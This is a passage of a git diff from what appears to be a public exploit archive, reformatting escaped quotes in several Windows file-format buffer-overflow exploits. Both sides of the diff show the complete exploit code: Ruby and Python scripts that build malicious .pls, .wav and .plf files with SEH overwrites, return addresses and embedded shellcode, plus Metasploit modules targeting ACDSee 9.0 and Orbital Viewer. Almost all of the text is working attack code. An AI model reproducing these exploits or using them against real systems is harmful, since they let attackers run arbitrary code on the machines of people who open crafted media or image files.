-\\\"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\\\\n\\\" +
-\\\"| \\\\\\\\___/\\\\\\\\____/_/   \\\\\\\\___/_/\\\\\\\\__,_/_/ /_/   \\\\\\\\__/\\\\\\\\___/\\\\\\\\__,_/_/ /_/ /_/  |\\\\n\\\" +
-\\\"|                                                                  |\\\\n\\\" +
-\\\"|                                       http://www.corelan.be:8800 |\\\\n\\\" +
-\\\"|                                                                  |\\\\n\\\" +
-\\\"|-------------------------------------------------[ EIP Hunters ]--|\\\\n\\\\n\\\"
+"|------------------------------------------------------------------|\n" +
+"|                         __               __                      |\n" +
+"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n" +
+"|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n" +
+"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n" +
+"| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n" +
+"|                                                                  |\n" +
+"|                                       http://www.corelan.be:8800 |\n" +
+"|                                                                  |\n" +
+"|-------------------------------------------------[ EIP Hunters ]--|\n\n"
 
 # Corelan Team MsgBox
 payload =
-\\\"\\\\xeb\\\\x22\\\\x56\\\\x31\\\\xc0\\\\x64\\\\x8b\\\\x40\\\\x30\\\\x85\\\\xc0\\\\x78\\\" +
-\\\"\\\\x0c\\\\x8b\\\\x40\\\\x0c\\\\x8b\\\\x70\\\\x1c\\\\xad\\\\x8b\\\\x40\\\\x08\\\\xeb\\\" +
-\\\"\\\\x09\\\\x8b\\\\x40\\\\x34\\\\x8d\\\\x40\\\\x7c\\\\x8b\\\\x40\\\\x3c\\\\x5e\\\\xc3\\\" +
-\\\"\\\\xeb\\\\x69\\\\x60\\\\x8b\\\\x6c\\\\x24\\\\x24\\\\x8b\\\\x45\\\\x3c\\\\x8b\\\\x54\\\" +
-\\\"\\\\x05\\\\x78\\\\x01\\\\xea\\\\x8b\\\\x4a\\\\x18\\\\x8b\\\\x5a\\\\x20\\\\x01\\\\xeb\\\" +
-\\\"\\\\xe3\\\\x34\\\\x49\\\\x8b\\\\x34\\\\x8b\\\\x01\\\\xee\\\\x31\\\\xff\\\\x31\\\\xc0\\\" +
-\\\"\\\\xfc\\\\xac\\\\x84\\\\xc0\\\\x74\\\\x07\\\\xc1\\\\xcf\\\\x0d\\\\x01\\\\xc7\\\\xeb\\\" +
-\\\"\\\\xf4\\\\x3b\\\\x7c\\\\x24\\\\x28\\\\x75\\\\xe1\\\\x8b\\\\x5a\\\\x24\\\\x01\\\\xeb\\\" +
-\\\"\\\\x66\\\\x8b\\\\x0c\\\\x4b\\\\x8b\\\\x5a\\\\x1c\\\\x01\\\\xeb\\\\x8b\\\\x04\\\\x8b\\\" +
-\\\"\\\\x01\\\\xe8\\\\x89\\\\x44\\\\x24\\\\x1c\\\\x61\\\\xc3\\\\xad\\\\x50\\\\x52\\\\xe8\\\" +
-\\\"\\\\xaa\\\\xff\\\\xff\\\\xff\\\\x89\\\\x07\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\" +
-\\\"\\\\x44\\\\x44\\\\x47\\\\x47\\\\x47\\\\x47\\\\x39\\\\xce\\\\x75\\\\xe6\\\\xc3\\\\x4c\\\" +
-\\\"\\\\x4c\\\\x4c\\\\x4c\\\\x89\\\\xe5\\\\xe8\\\\x68\\\\xff\\\\xff\\\\xff\\\\x89\\\\xc2\\\" +
-\\\"\\\\xeb\\\\x1c\\\\x5e\\\\x8d\\\\x7d\\\\x04\\\\x89\\\\xf1\\\\x80\\\\xc1\\\\x0c\\\\xe8\\\" +
-\\\"\\\\xc8\\\\xff\\\\xff\\\\xff\\\\xeb\\\\x15\\\\x31\\\\xd2\\\\x59\\\\x88\\\\x51\\\\x36\\\" +
-\\\"\\\\x51\\\\x52\\\\xff\\\\x54\\\\x24\\\\x0c\\\\xe8\\\\xdf\\\\xff\\\\xff\\\\xff\\\\x57\\\" +
-\\\"\\\\x7f\\\\x29\\\\x62\\\\xe8\\\\xe6\\\\xff\\\\xff\\\\xff\\\\x43\\\\x6f\\\\x72\\\\x65\\\" +
-\\\"\\\\x6c\\\\x61\\\\x6e\\\\x20\\\\x54\\\\x65\\\\x61\\\\x6d\\\\x20\\\\x53\\\\x68\\\\x65\\\" +
-\\\"\\\\x6c\\\\x6c\\\\x63\\\\x6f\\\\x64\\\\x65\\\\x20\\\\x2d\\\\x20\\\\x50\\\\x72\\\\x6f\\\" +
-\\\"\\\\x67\\\\x72\\\\x61\\\\x6d\\\\x20\\\\x65\\\\x78\\\\x70\\\\x6c\\\\x6f\\\\x69\\\\x74\\\" +
-\\\"\\\\x65\\\\x64\\\\x20\\\\x73\\\\x75\\\\x63\\\\x65\\\\x73\\\\x73\\\\x66\\\\x75\\\\x6c\\\" +
-\\\"\\\\x6c\\\\x79\\\\x58\\\"
+"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
+"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
+"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
+"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
+"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
+"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
+"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
+"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
+"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
+"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
+"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
+"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
+"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
+"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
+"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
+"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
+"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
+"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
+"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
+"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
+"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
+"\x6c\x79\x58"
 
 print banner
-puts \\\"[+] Exploit for Audiotran 1.4.1.\\\"
+puts "[+] Exploit for Audiotran 1.4.1."
 
-filename = \\\"audiotran_poc.pls\\\"
-f = File.new(filename, \\\'w\\\')
-f.write \\\'A\\\' * 1308 #padding
-f.write \\\"\\\\xeb\\\\x06\\\\x90\\\\x90\\\"
-f.write \\\"\\\\xcb\\\\x75\\\\x52\\\\x73\\\" # ret at 0x735275CB [msvbvm60.dll]
+filename = "audiotran_poc.pls"
+f = File.new(filename, 'w')
+f.write 'A' * 1308 #padding
+f.write "\xeb\x06\x90\x90"
+f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
 f.write payload
-f.write \\\'A\\\' * 9000 # padding
+f.write 'A' * 9000 # padding
 f.close
 
-puts \\\"[+] Wrote exploit file : #{filename}.\\\"
\ No newline at end of file
+puts "[+] Wrote exploit file : #{filename}."
\ No newline at end of file
diff --git a/platforms/windows/local/15279.rb b/platforms/windows/local/15279.rb
index a3dc75cf6..9f2c26e77 100755
--- a/platforms/windows/local/15279.rb
+++ b/platforms/windows/local/15279.rb
@@ -8,36 +8,36 @@
 
 #! /usr/bin/env ruby
 
-junk = \"\\x41\" * 4132
+junk = "\x41" * 4132
 
-nSEH = \"\\x90\\x90\\xeb\\x06\"
+nSEH = "\x90\x90\xeb\x06"
 
-SEH = [0x0046bee3].pack(\'V\') #pop pop ret from FatPlayer.exe
+SEH = [0x0046bee3].pack('V') #pop pop ret from FatPlayer.exe
 
-junk2 = \"\\x42\\x42\"
+junk2 = "\x42\x42"
 
 # windows/exec - 144 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # EXITFUNC=seh, CMD=calc
-payload =  \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\"
-payload << \"\\xd9\\x74\\x24\\xf4\\xb1\\x1e\\x58\\x31\\x78\"
-payload << \"\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\"
-payload << \"\\x30\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\"
-payload << \"\\xf3\\xb4\\xae\\x7d\\x02\\xaa\\x3a\\x32\\x1c\"
-payload << \"\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\"
-payload << \"\\xe7\\x96\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\"
-payload << \"\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\\xf0\\x27\"
-payload << \"\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\"
-payload << \"\\xf7\\x3b\\x7a\\xcf\\x4c\\x4f\\x23\\xd3\\x53\"
-payload << \"\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\\x1f\"
-payload << \"\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\"
-payload << \"\\xf5\\xc1\\x7e\\x98\\xf5\\xaa\\xf1\\x05\\xa8\"
-payload << \"\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\"
-payload << \"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\"
-payload << \"\\x59\\x90\\x7b\\xd7\\x05\\x7f\\xe8\\x7b\\xca\"
+payload =  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
+payload << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
+payload << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
+payload << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
+payload << "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c"
+payload << "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21"
+payload << "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5"
+payload << "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27"
+payload << "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3"
+payload << "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53"
+payload << "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f"
+payload << "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6"
+payload << "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8"
+payload << "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
+payload << "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f"
+payload << "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
 
 
-File.open(\"crash.wav\", \'w\') do |b|
+File.open("crash.wav", 'w') do |b|
 	b.write junk + nSEH + SEH + junk2 + payload
 end
diff --git a/platforms/windows/local/15489.py b/platforms/windows/local/15489.py
index 0e1bfb668..b00078d9d 100755
--- a/platforms/windows/local/15489.py
+++ b/platforms/windows/local/15489.py
@@ -1,7 +1,7 @@
 #!usr/bin/python
 #
 #Exploit Title: Exploit Buffer Overflow MP3-Nator
-#Date: 10\\11\\2010
+#Date: 10\11\2010
 #Author: C4SS!0 G0M3S
 #Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
 #Version: 2.0
@@ -19,64 +19,64 @@
 import os,sys
 
 def layout():
-    os.system(\"cls\")
-    os.system(\"color 4f\")
-    print(\"\\n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0\")
-    print(\"[+]Author     :    C4SS!0 G0M3S\")
-    print(\"[+]E-mail     :    Louredo_@hotmail.com\")
-    print(\"[+]Home       :    http://www.invasao.com.br\")
-    print(\"[+]Impact     :    Hich\")
-    print(\"[+]Version    :    2.0\\n\")
+    os.system("cls")
+    os.system("color 4f")
+    print("\n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0")
+    print("[+]Author     :    C4SS!0 G0M3S")
+    print("[+]E-mail     :    Louredo_@hotmail.com")
+    print("[+]Home       :    http://www.invasao.com.br")
+    print("[+]Impact     :    Hich")
+    print("[+]Version    :    2.0\n")
 
 if len(sys.argv)!=2:
 
     layout()
-    print(\"[-]Usage: Exploit.py \")
-    print(\"[-]Exemple: Exploit.py musics.plf\\n\")
-    print(\"[-]Note: The Extension of the File Should be .plf for the Exploit Work\")
+    print("[-]Usage: Exploit.py ")
+    print("[-]Exemple: Exploit.py musics.plf\n")
+    print("[-]Note: The Extension of the File Should be .plf for the Exploit Work")
     
 else:
     #Exec The Calc.exe
-    buffer = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"
-    \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"
-    \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"
-    \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"
-    \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"
-    \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\"  
-    \"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\"
-    \"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\"
-    \"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\"
-    \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"
-    \"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\"
-    \"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\"
-    \"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\"
-    \"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"
-    \"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\"
-    \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\"
-    \"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\"
-    \"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\"
-    \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\"
-    \"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\"
-    \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\"
-    \"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\")
+    buffer = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+    "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"  
+    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
+    "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
+    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
+    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+    "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
+    "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
+    "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
+    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
+    "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
+    "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
+    "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
+    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
+    "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
+    "\x4e\x46\x43\x36\x42\x50\x5a")
 
-    nseh=\"\\x90\\x90\\xeb\\xf6\"
-    seh=\"\\x1a\\xab\\x51\\x00\"
-    nops=\"\\x90\" * 3000
-    nops2=\"\\x90\" * 760
-    shell=\"\\xcc\" * 600
-    jmp=\"\\xe8\\x5b\\xfb\\xff\\xff\" #Jmp From Start The My Shellcode 
+    nseh="\x90\x90\xeb\xf6"
+    seh="\x1a\xab\x51\x00"
+    nops="\x90" * 3000
+    nops2="\x90" * 760
+    shell="\xcc" * 600
+    jmp="\xe8\x5b\xfb\xff\xff" #Jmp From Start The My Shellcode 
     file=str(sys.argv[1])
     
-    op=\"w\"
+    op="w"
     try:
         f=open(file,op)
         f.write(nops+buffer+nops2+jmp+nseh+seh+shell)
         f.close()
         layout()
-        print(\"[+]Creating File: \"+file)
-        print(\"[+]Identifying Shellcode length\")
-        print(\"[+]The Length of Your Shellcode:\"+str(len(buffer)))
-        print(\"[+]File \"+file+\" Created Successfully\")
+        print("[+]Creating File: "+file)
+        print("[+]Identifying Shellcode length")
+        print("[+]The Length of Your Shellcode:"+str(len(buffer)))
+        print("[+]File "+file+" Created Successfully")
     except IOError:
-        print(\"[+]Error in Create The File\")
+        print("[+]Error in Create The File")
diff --git a/platforms/windows/local/16632.rb b/platforms/windows/local/16632.rb
index 95d34e297..5a89c9b5c 100755
--- a/platforms/windows/local/16632.rb
+++ b/platforms/windows/local/16632.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'ACDSee XPM File Section Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'ACDSee XPM File Section Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a buffer overflow in ACDSee 9.0.
 				When viewing a malicious XPM file with the ACDSee product,
 				a remote attacker could overflow a buffer and execute
 				arbitrary code.
 			},
-			\'License\'        => MSF_LICENSE,
-			\'Author\'         => \'MC\',
-			\'Version\'        => \'$Revision: 10477 $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Author'         => 'MC',
+			'Version'        => '$Revision: 10477 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2007-2193\' ],
-					[ \'OSVDB\', \'35236\' ],
-					[ \'BID\', \'23620\' ],
+					[ 'CVE', '2007-2193' ],
+					[ 'OSVDB', '35236' ],
+					[ 'BID', '23620' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
-					\'DisablePayloadHandler\' => \'true\',
+					'EXITFUNC' => 'process',
+					'DisablePayloadHandler' => 'true',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'    => 750,
-					\'BadChars\' => \"\\x00\",
-					\'StackAdjustment\' => -3500,
-					\'EncoderType\'   => Msf::Encoder::Type::AlphanumUpper,
-					\'DisableNops\'   =>  \'True\',
+					'Space'    => 750,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops'   =>  'True',
 				},
-			\'Platform\' => \'win\',
-			\'Targets\'        =>
+			'Platform' => 'win',
+			'Targets'        =>
 				[
-					[ \'ACDSee 9.0 (Build 1008)\', { \'Ret\' => 0x10020758 } ],
+					[ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],
 				],
-			\'Privileged\'     => false,
-			\'DisclosureDate\' => \'Nov 23 2007\',
-			\'DefaultTarget\'  => 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Nov 23 2007',
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.xpm\']),
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.xpm']),
 			], self.class)
 	end
 
@@ -68,17 +68,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		filler = rand_text_alpha_upper(rand(25) + 1)
 
 		# http://www.fileformat.info/format/xpm/
-		head =  \"/* XPM */\\r\\n\"
-		head << \"static char * #{filler}[] = {\\r\\n\"
-		head << \"\\\"\"
+		head =  "/* XPM */\r\n"
+		head << "static char * #{filler}[] = {\r\n"
+		head << "\""
 
 		buff =  rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)
 
-		foot =  \"\\\",\\r\\n\" + \"};\\r\\n\"
+		foot =  "\",\r\n" + "};\r\n"
 
 		xpm = head + buff + foot
 
-		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
 
 		file_create(xpm)
 
diff --git a/platforms/windows/local/16654.rb b/platforms/windows/local/16654.rb
index e956dcc48..e066b24dd 100755
--- a/platforms/windows/local/16654.rb
+++ b/platforms/windows/local/16654.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Orbital Viewer ORB File Parsing Buffer Overflow\',
-			\'Description\'    => %q{
-					This module exploits a stack-based buffer overflow in David Manthey\'s
+			'Name'           => 'Orbital Viewer ORB File Parsing Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in David Manthey's
 				Orbital Viewer. When processing .ORB files, data is read from file into
 				a fixed-size stack buffer using the fscanf function. Since no bounds
 				checking is done, a buffer overflow can occur. Attackers can execute
 				arbitrary code by convincing their victim to open an ORB file.
 			},
-			\'License\'        => MSF_LICENSE,
-			\'Author\' 	     => [ \'jduck\' ],
-			\'Version\'        => \'$Revision: 8757 $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Author' 	     => [ 'jduck' ],
+			'Version'        => '$Revision: 8757 $',
+			'References'     =>
 				[
-					[ \'BID\', \'38436\' ],
-					[ \'OSVDB\', \'62580\' ],
-					[ \'CVE\', \'2010-0688\' ],
-					[ \'URL\', \'http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/\' ],
-					[ \'URL\', \'http://www.exploit-db.com/exploits/11581\' ]
+					[ 'BID', '38436' ],
+					[ 'OSVDB', '62580' ],
+					[ 'CVE', '2010-0688' ],
+					[ 'URL', 'http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/11581' ]
 				],
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'       => 2048,
-					\'BadChars\'    => \"\\x00\\x09\\x0a\\x0d\\x20\", # \\xbd was safe in my test, \\x09 was not
-					\'DisableNops\' => true,
+					'Space'       => 2048,
+					'BadChars'    => "\x00\x09\x0a\x0d\x20", # \xbd was safe in my test, \x09 was not
+					'DisableNops' => true,
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Orbital Viewer 1.04 on Windows XP SP3\',
+					[ 'Orbital Viewer 1.04 on Windows XP SP3',
 						{
-							\'Ret\' => 0x004032a2, # p/p/r in ov.exe v1.0.0.2
+							'Ret' => 0x004032a2, # p/p/r in ov.exe v1.0.0.2
 						}
 					],
 				],
-			\'Privileged\'     => false,
-			\'DisclosureDate\' => \'Feb 27 2010\',
-			\'DefaultTarget\'  => 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Feb 27 2010',
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.orb\']),
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.orb']),
 			], self.class)
 	end
 
@@ -70,28 +70,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		# One for DnD and File->Open
 		seh2 = seh1 + 2092
 
-		sploit = \"OrbitalFileV1.0\\r\\n\"
+		sploit = "OrbitalFileV1.0\r\n"
 
-		line2 = \'\'
+		line2 = ''
 		nop_count = seh1 - payload.encoded.length
 		line2 << make_nops(nop_count)
 		line2 << payload.encoded
 
 		line2 << generate_seh_record(target.ret)
 		distance = seh1 + 8
-		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string
+		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
 
 		line2 << rand_text_alphanumeric(seh2 - line2.length)
 		line2 << generate_seh_record(target.ret)
 		distance = seh2 + 8
-		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string
+		line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
 
 		# Crash writing past end of stack...
 		line2 << rand_text_alphanumeric(1024) * 20
 
 		sploit << line2
 
-		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
 
 		file_create(sploit)
 
diff --git a/platforms/windows/local/16661.rb b/platforms/windows/local/16661.rb
index ce2929445..08a7af28e 100755
--- a/platforms/windows/local/16661.rb
+++ b/platforms/windows/local/16661.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -19,47 +19,47 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Audio Workstation 6.4.2.4.3 pls Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
 				When opening a malicious pls file with the Audio Workstation,
 				a remote attacker could overflow a buffer and execute
 				arbitrary code.
 			},
-			\'License\'        => MSF_LICENSE,
-			\'Author\'         => [ \'germaya_x\', \'dookie\', ],
-			\'Version\'        => \'$Revision: 10477 $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'germaya_x', 'dookie', ],
+			'Version'        => '$Revision: 10477 $',
+			'References'     =>
 				[
